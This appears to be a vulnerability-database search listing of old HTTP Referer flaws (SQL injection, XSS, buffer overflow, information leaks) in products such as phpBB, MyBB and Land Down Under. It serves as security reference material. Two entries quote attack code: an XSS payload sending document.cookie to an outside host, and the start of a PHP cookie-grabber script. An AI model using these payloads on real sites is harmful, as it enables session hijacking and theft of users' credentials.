439 matches found
CVE-2006-1787
Adobe Document Server for Reader Extensions 6.0 includes a user's session (jsession) ID in the HTTP Referer header, which allows remote attackers to gain access to PDF files that are being processed within that session...
CVE-2005-4711
SQL injection vulnerability in Neocrome Land Down Under (LDU) 801 allows remote attackers to execute arbitrary SQL commands via an HTTP Referer header. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...
CVE-2005-4711
Neocrome Land Down Under (LDU) 801 is affected by CVE-2005-4711: SQL injection via input from the HTTP Referer header. The issue allows remote attackers to execute arbitrary SQL commands on the backend database. The Nessus NASL item for LDU_REFERER_SQL_INJECTION.NASL documents that input from the...
CVE-2006-0495
Cross-site scripting (XSS) vulnerability in the Add Thread to Favorites feature in usercp2.php in MyBB (aka MyBulletinBoard) 1.02 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer header ($url variable)...
Cross site scripting
Cross-site scripting (XSS) vulnerability in the Add Thread to Favorites feature in usercp2.php in MyBB (aka MyBulletinBoard) 1.02 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer header ($url variable)...
CVE-2006-0495
The CVE-2006-0495 entry concerns MyBB (MyBulletinBoard) 1.02. A Cross‑Site Scripting (XSS) flaw exists in the Add Thread to Favorites feature implemented in usercp2.php, exploitable via an HTTP Referer header (the $url variable). This allows remote attackers to inject arbitrary web script or HTML...
PHP-Nuke News Submission Story - Text Field Cross-Site Scripting
Source: https://www.securityfocus.com/bid/16192/info. The PHPNuke Pool and News Modules are prone to an HTML injection vulnerability. This issue is due to a failure in the application modules to properly sanitize user-supplied input...
phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure
/ phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0; X="' c.php: milw0rm.com 2005-12-21...
CVE-2005-4012
Multiple cross-site scripting (XSS) vulnerabilities in PHP Web Statistik 1.4 allow remote attackers to inject arbitrary web script or HTML via (1) the lastnumber parameter to stat.php and (2) the HTTP referer to pixel.php...
CVE-2005-3931
CVE-2005-3931: A SQL injection flaw exists in default.asp of ASP-Rider 1.6, allowing remote attackers to inject arbitrary SQL commands via the HTTP Referer. The vulnerability targets the input handling in that page/file, enabling unauthorized data access or manipulation as described in the publ...
CVE-2005-3931
SQL injection vulnerability in default.asp in ASP-Rider 1.6 allows remote attackers to execute arbitrary SQL commands via the HTTP referer...
Land Down Under HTTP Referer Header SQL Injection
The installed version of Land Down Under fails to sanitize input passed through the HTTP Referer header before using it in database queries. Provided PHP's 'magic_quotes_gpc' setting is disabled, an attacker can exploit this issue to manipulate database queries, possibly revealing sensitive...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
No description provided by source. // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ <?php $cookie = $_GET['c']; $ip = getenv('REMOTE_ADDR'); $date = date("j F, Y, g:i a"); $referer = getenv('HTTP_REFERER'); $fp = fopen('cookies.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP:...
CVE-2003-1186
Buffer overflow in TelCondex SimpleWebServer 2.12.30210 Build3285 allows remote attackers to execute arbitrary code via a long HTTP Referer header...
Mozilla OnUnload Referer Information Leakage Race Condition Information Disclosure (deprecated)
RHEL 2.1 : kdelibs (RHSA-2003:236)
This erratum provides updated KDE packages that resolve a security issue in Konqueror. KDE is a graphical desktop environment for the X Window System. Konqueror is the file manager for the K Desktop Environment. George Staikos reported that Konqueror may inadvertently send authentication...
CVE-2004-0259
The CVE affects Formmail.php version 5.0 and earlier, where check_referer() can be bypassed by an empty or spoofed HTTP Referer, enabling access restriction bypass. The vulnerability is demonstrated via an application on the same web server that contains an associated cross-site scripting (XSS) i...